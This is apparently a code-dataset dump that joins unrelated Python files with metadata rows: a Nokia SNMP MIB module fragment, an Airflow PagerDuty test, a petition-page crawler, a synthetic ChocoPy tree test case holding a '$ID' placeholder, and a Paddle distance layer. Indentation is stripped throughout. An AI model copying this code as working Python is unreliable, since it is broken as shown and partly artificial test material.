if mibBuilder.loadTexts: noiMeasurementResultTableMaxCount.setDescription('Contains the maximum number of entries in the in the measurement table.')
noiPmLastMeasurementResultId = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 3), NoiMeasurementResultIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiPmLastMeasurementResultId.setStatus('current')
if mibBuilder.loadTexts: noiPmLastMeasurementResultId.setDescription('This object represent the measurement identifier of last send notification noiMeasurementResultReady The manager can retrieve the current value of this object to detect lost notifications. This mechanism can be used by the manager when no notification is received for a certain time (e.g. 30 minutes) to evaluate whether an retrieval of of entries from the measurement table shall be performed')
noiMeasurementResultTable = MibTable((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 4), )
if mibBuilder.loadTexts: noiMeasurementResultTable.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultTable.setDescription('Table containing information about the measurement files that are currently stored in the Network Element and accessible for the manager. Agent will create a new entry, whenever a new measurement file has been created. When removing a measurement file, the corresponding entry in the table must be removed.')
noiMeasurementResultEntry = MibTableRow((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 4, 1), ).setIndexNames((0, "NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultIdentifier"))
if mibBuilder.loadTexts: noiMeasurementResultEntry.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultEntry.setDescription('One entry in the measurement table, containing the information of one measurement file.')
noiMeasurementResultIdentifier = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 4, 1, 1), NoiMeasurementResultIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiMeasurementResultIdentifier.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultIdentifier.setDescription('This object represents the measurement identifier of an entry in the measurement table. It uniquely identifies an entry in the table.')
noiMeasurementFileName = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 4, 1, 2), NoiMeasurementFileName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiMeasurementFileName.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementFileName.setDescription('This object represents the file name of a measurement result file.')
noiMeasurementFileDirectory = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 4, 1, 3), NoiMeasurementFileDirectory()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiMeasurementFileDirectory.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementFileDirectory.setDescription('This object represents the full path of a measurement resulta file.')
noiPmEventTime = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 4, 1, 4), NoiEventTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiPmEventTime.setStatus('current')
if mibBuilder.loadTexts: noiPmEventTime.setDescription('This object represents the time the event occured.')
noiMeasurementResultReady = NotificationType((1, 3, 6, 1, 4, 1, 94, 7, 3, 3, 0, 1)).setObjects(("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultIdentifier"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementFileDirectory"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementFileName"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmEventTime"))
if mibBuilder.loadTexts: noiMeasurementResultReady.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultReady.setDescription('This notification is used when a new measurement data file has been created and a new entry in the measurement table has been inserted.')
noiMeasurementResultTableRebuild = NotificationType((1, 3, 6, 1, 4, 1, 94, 7, 3, 3, 0, 2)).setObjects(("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmAdditionalText"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmEventTime"))
if mibBuilder.loadTexts: noiMeasurementResultTableRebuild.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultTableRebuild.setDescription('This notification is used when the measurement table in the agent has been rebuild. The notification will be emitted after the measurement table has been dropped and all previously stored entries have been removed')
noiPmIRPCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 94, 7, 3, 6, 1)).setObjects(("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmMandatoryGroup"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmNotificationOptionalGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
noiPmIRPCompliance = noiPmIRPCompliance.setStatus('current')
if mibBuilder.loadTexts: noiPmIRPCompliance.setDescription('This specifies the objects that are required to claim compliance to NE3S PM Fragment.')
noiPmMandatoryGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 94, 7, 3, 6, 2)).setObjects(("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmIrpVersion"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmLastMeasurementResultId"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementScheduleFileDirectory"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultTableCount"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultTableMaxCount"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultIdentifier"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementFileDirectory"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementFileName"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmEventTime"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmFileStoringPeriod"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
noiPmMandatoryGroup = noiPmMandatoryGroup.setStatus('current')
if mibBuilder.loadTexts: noiPmMandatoryGroup.setDescription('A collection of objects that represents mandatory PM attributes.')
noiPmNotificationOptionalGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 94, 7, 3, 6, 3)).setObjects(("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultReady"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultTableRebuild"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
noiPmNotificationOptionalGroup = noiPmNotificationOptionalGroup.setStatus('current')
if mibBuilder.loadTexts: noiPmNotificationOptionalGroup.setDescription('A collection of optional measurement notifications.')
mibBuilder.exportSymbols("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", noiPmMandatoryGroup=noiPmMandatoryGroup, noiMeasurementResultIdentifier=noiMeasurementResultIdentifier, noiSnmpPmIrp=noiSnmpPmIrp, noiMeasurementFileDirectory=noiMeasurementFileDirectory, noiMeasurementResultTableCount=noiMeasurementResultTableCount, noiPmIrpVersion=noiPmIrpVersion, noiPmNotificationOptionalGroup=noiPmNotificationOptionalGroup, noiMeasurementJobStatus=noiMeasurementJobStatus, noiMeasurementFileName=noiMeasurementFileName, noiMeasurementResultTableRebuild=noiMeasurementResultTableRebuild, noiPmEventTime=noiPmEventTime, noiPmLastMeasurementResultId=noiPmLastMeasurementResultId, noiMeasurementResultEntry=noiMeasurementResultEntry, noiPmResultTransfer=noiPmResultTransfer, noiPmFileStoringPeriod=noiPmFileStoringPeriod, noiMeasurementActivationError=noiMeasurementActivationError, noiPmAdditionalText=noiPmAdditionalText, noiMeasurementResultTable=noiMeasurementResultTable, noiMeasurementScheduleFileDirectory=noiMeasurementScheduleFileDirectory, noiMeasurementRepositoryDirectory=noiMeasurementRepositoryDirectory, noiMeasurementResultReady=noiMeasurementResultReady, noiMeasurementRepositoryFile=noiMeasurementRepositoryFile, noiMeasurementResultTableMaxCount=noiMeasurementResultTableMaxCount, noiPmIRPCompliance=noiPmIRPCompliance, noiPmFileTransferProtocol=noiPmFileTransferProtocol, PYSNMP_MODULE_ID=noiSnmpPmIrp)
| [
"[email protected]"
] | |
767c2bfac9638826491205fbf82df7b3dfcd3672 | 6169a0af24553278c9493c9ac14d2351e9085afd | /tests/providers/pagerduty/hooks/test_pagerduty_events.py | 3c68ba8247954e373fa2502a56287ba653a750a3 | [
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | Nextdoor/airflow | c994f8fbaf48bebd891300f44dd78a58fd0b057b | 863ec46e25ea49d6d5b006d8fd3a83f50aa9db79 | refs/heads/master | 2023-06-12T19:25:58.052324 | 2023-01-20T17:43:14 | 2023-01-20T17:43:14 | 54,076,271 | 7 | 8 | Apache-2.0 | 2023-06-05T20:38:53 | 2016-03-17T00:34:45 | Python | UTF-8 | Python | false | false | 2,285 | py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import annotations
import pytest
from airflow.models import Connection
from airflow.providers.pagerduty.hooks.pagerduty import PagerdutyEventsHook
from airflow.utils import db
DEFAULT_CONN_ID = "pagerduty_events_default"
@pytest.fixture(scope="class")
def events_connections():
db.merge_conn(Connection(conn_id=DEFAULT_CONN_ID, conn_type="pagerduty_events", password="events_token"))
class TestPagerdutyEventsHook:
def test_get_integration_key_from_password(self, events_connections):
hook = PagerdutyEventsHook(pagerduty_events_conn_id=DEFAULT_CONN_ID)
assert hook.integration_key == "events_token", "token initialised."
def test_token_parameter_override(self, events_connections):
hook = PagerdutyEventsHook(integration_key="override_key", pagerduty_events_conn_id=DEFAULT_CONN_ID)
assert hook.integration_key == "override_key", "token initialised."
def test_create_event(self, requests_mock, events_connections):
hook = PagerdutyEventsHook(pagerduty_events_conn_id=DEFAULT_CONN_ID)
mock_response_body = {
"status": "success",
"message": "Event processed",
"dedup_key": "samplekeyhere",
}
requests_mock.post("https://events.pagerduty.com/v2/enqueue", json=mock_response_body)
resp = hook.create_event(
summary="test",
source="airflow_test",
severity="error",
)
assert resp == mock_response_body
| [
"[email protected]"
] | |
2e8d96e368d310b51d62e922dc251c8951687ea3 | 8a00b3895a626cf539a526b62c517deea06971d4 | /stage.py | 9d9b0332b17a9699b9cb20e7429128322ce4261e | [
"MIT"
] | permissive | SJang1/korea-president-petition-crawler | f77083cdfaa7efc38b4e39966259c47f310613d9 | a377b098562a2c22748c437fd320cc8f7aabcdcb | refs/heads/master | 2020-04-22T13:23:50.183111 | 2019-02-13T00:45:48 | 2019-02-13T00:45:48 | 170,407,752 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 806 | py | import requests
from bs4 import BeautifulSoup
import time
import os
codes = ["522031"]
def crawl(code):
url = "https://www1.president.go.kr/petitions/{}".format(code)
data = requests.get(url)
return data.content
def user(string):
httprequest = BeautifulSoup(string, "html.parser")
wrapuser = httprequest.find("h2", {"class":"petitionsView_count"})
users = wrapuser.find("span", {"class":"counter"})
title = httprequest.find("h3", {"class":"petitionsView_title"})
timestamp = time.ctime()
return {"time":timestamp,"title":title.text, "agrees":users.text}
def main():
for code in codes:
predata = user(crawl(code))
f = open("output.txt", "a")
f.write(os.linesep + str(predata))
f.close()
time.sleep(150)
main()
main()
| [
"[email protected]"
] | |
08631b60708e517e228451d1629faaf2e74402f4 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/synthetic/tree-big-6757.py | b4b3b9f3005553b5202d6d4dff1c2e95e4d0376b | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,289 | py | # Binary-search trees
class TreeNode(object):
value:int = 0
left:"TreeNode" = None
right:"TreeNode" = None
def insert(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode(x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode(x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode2(object):
value:int = 0
value2:int = 0
left:"TreeNode2" = None
left2:"TreeNode2" = None
right:"TreeNode2" = None
right2:"TreeNode2" = None
def insert(self:"TreeNode2", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode2(x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode2(x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode2", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode2(x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode2(x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode2", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode2", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode3(object):
value:int = 0
value2:int = 0
value3:int = 0
left:"TreeNode3" = None
left2:"TreeNode3" = None
left3:"TreeNode3" = None
right:"TreeNode3" = None
right2:"TreeNode3" = None
right3:"TreeNode3" = None
def insert(self:"TreeNode3", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode3", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode3", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode3", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode4(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
left:"TreeNode4" = None
left2:"TreeNode4" = None
left3:"TreeNode4" = None
left4:"TreeNode4" = None
right:"TreeNode4" = None
right2:"TreeNode4" = None
right3:"TreeNode4" = None
right4:"TreeNode4" = None
def insert(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode5(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
value5:int = 0
left:"TreeNode5" = None
left2:"TreeNode5" = None
left3:"TreeNode5" = None
left4:"TreeNode5" = None
left5:"TreeNode5" = None
right:"TreeNode5" = None
right2:"TreeNode5" = None
right3:"TreeNode5" = None
right4:"TreeNode5" = None
right5:"TreeNode5" = None
def insert(self:"TreeNode5", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode5", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode5", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode5", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class Tree(object):
root:TreeNode = None
size:int = 0
def insert(self:"Tree", x:int) -> object:
if self.root is None:
self.root = makeNode(x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree2(object):
root:TreeNode2 = None
root2:TreeNode2 = None
size:int = 0
size2:int = 0
def insert(self:"Tree2", x:int) -> object:
if self.root is None:
self.root = makeNode2(x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree2", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode2(x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree2", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree2", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree3(object):
root:TreeNode3 = None
root2:TreeNode3 = None
root3:TreeNode3 = None
size:int = 0
size2:int = 0
size3:int = 0
def insert(self:"Tree3", x:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree3", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree3", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree3", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree3", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree3", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree4(object):
root:TreeNode4 = None
root2:TreeNode4 = None
root3:TreeNode4 = None
root4:TreeNode4 = None
size:int = 0
size2:int = 0
size3:int = 0
size4:int = 0
def insert(self:"Tree4", x:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree4", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree4", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree4", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree4", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree4", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree5(object):
root:TreeNode5 = None
root2:TreeNode5 = None
root3:TreeNode5 = None
root4:TreeNode5 = None
root5:TreeNode5 = None
size:$ID = 0
size2:int = 0
size3:int = 0
size4:int = 0
size5:int = 0
def insert(self:"Tree5", x:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree5", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree5", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree5", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree5", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree5", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def makeNode(x: int) -> TreeNode:
b:TreeNode = None
b = TreeNode()
b.value = x
return b
def makeNode2(x: int, x2: int) -> TreeNode2:
b:TreeNode2 = None
b2:TreeNode2 = None
b = TreeNode2()
b.value = x
return b
def makeNode3(x: int, x2: int, x3: int) -> TreeNode3:
b:TreeNode3 = None
b2:TreeNode3 = None
b3:TreeNode3 = None
b = TreeNode3()
b.value = x
return b
def makeNode4(x: int, x2: int, x3: int, x4: int) -> TreeNode4:
b:TreeNode4 = None
b2:TreeNode4 = None
b3:TreeNode4 = None
b4:TreeNode4 = None
b = TreeNode4()
b.value = x
return b
def makeNode5(x: int, x2: int, x3: int, x4: int, x5: int) -> TreeNode5:
b:TreeNode5 = None
b2:TreeNode5 = None
b3:TreeNode5 = None
b4:TreeNode5 = None
b5:TreeNode5 = None
b = TreeNode5()
b.value = x
return b
# Input parameters
n:int = 100
n2:int = 100
n3:int = 100
n4:int = 100
n5:int = 100
c:int = 4
c2:int = 4
c3:int = 4
c4:int = 4
c5:int = 4
# Data
t:Tree = None
t2:Tree = None
t3:Tree = None
t4:Tree = None
t5:Tree = None
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
k:int = 37813
k2:int = 37813
k3:int = 37813
k4:int = 37813
k5:int = 37813
# Crunch
t = Tree()
while i < n:
t.insert(k)
k = (k * 37813) % 37831
if i % c != 0:
t.insert(i)
i = i + 1
print(t.size)
for i in [4, 8, 15, 16, 23, 42]:
if t.contains(i):
print(i)
| [
"[email protected]"
] | |
f446b6c8b2833b421592915d637db99761f2c596 | 18aee5d93a63eab684fe69e3aa0abd1372dd5d08 | /python/paddle/nn/layer/distance.py | e2fb10f252f1008f0ddc5e41e1e48afbedb8d67c | [
"Apache-2.0"
] | permissive | Shixiaowei02/Paddle | 8d049f4f29e281de2fb1ffcd143997c88078eadb | 3d4d995f26c48f7792b325806ec3d110fc59f6fc | refs/heads/develop | 2023-06-26T06:25:48.074273 | 2023-06-14T06:40:21 | 2023-06-14T06:40:21 | 174,320,213 | 2 | 1 | Apache-2.0 | 2022-12-28T05:14:30 | 2019-03-07T10:09:34 | C++ | UTF-8 | Python | false | false | 3,333 | py | # Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .. import functional as F
from .layers import Layer
__all__ = []
class PairwiseDistance(Layer):
r"""
It computes the pairwise distance between two vectors. The
distance is calculated by p-oreder norm:
.. math::
\Vert x \Vert _p = \left( \sum_{i=1}^n \vert x_i \vert ^ p \right) ^ {1/p}.
Parameters:
p (float, optional): The order of norm. Default: :math:`2.0`.
epsilon (float, optional): Add small value to avoid division by zero.
Default: :math:`1e-6`.
keepdim (bool, optional): Whether to reserve the reduced dimension
in the output Tensor. The result tensor is one dimension less than
the result of ``|x-y|`` unless :attr:`keepdim` is True. Default: False.
name (str, optional): For details, please refer to :ref:`api_guide_Name`.
Generally, no setting is required. Default: None.
Shape:
- x: :math:`[N, D]` or :math:`[D]`, where :math:`N` is batch size, :math:`D`
is the dimension of the data. Available data type is float16, float32, float64.
- y: :math:`[N, D]` or :math:`[D]`, y have the same dtype as x.
- output: The same dtype as input tensor.
- If :attr:`keepdim` is True, the output shape is :math:`[N, 1]` or :math:`[1]`,
depending on whether the input has data shaped as :math:`[N, D]`.
- If :attr:`keepdim` is False, the output shape is :math:`[N]` or :math:`[]`,
depending on whether the input has data shaped as :math:`[N, D]`.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([[1., 3.], [3., 5.]], dtype=paddle.float64)
y = paddle.to_tensor([[5., 6.], [7., 8.]], dtype=paddle.float64)
dist = paddle.nn.PairwiseDistance()
distance = dist(x, y)
print(distance)
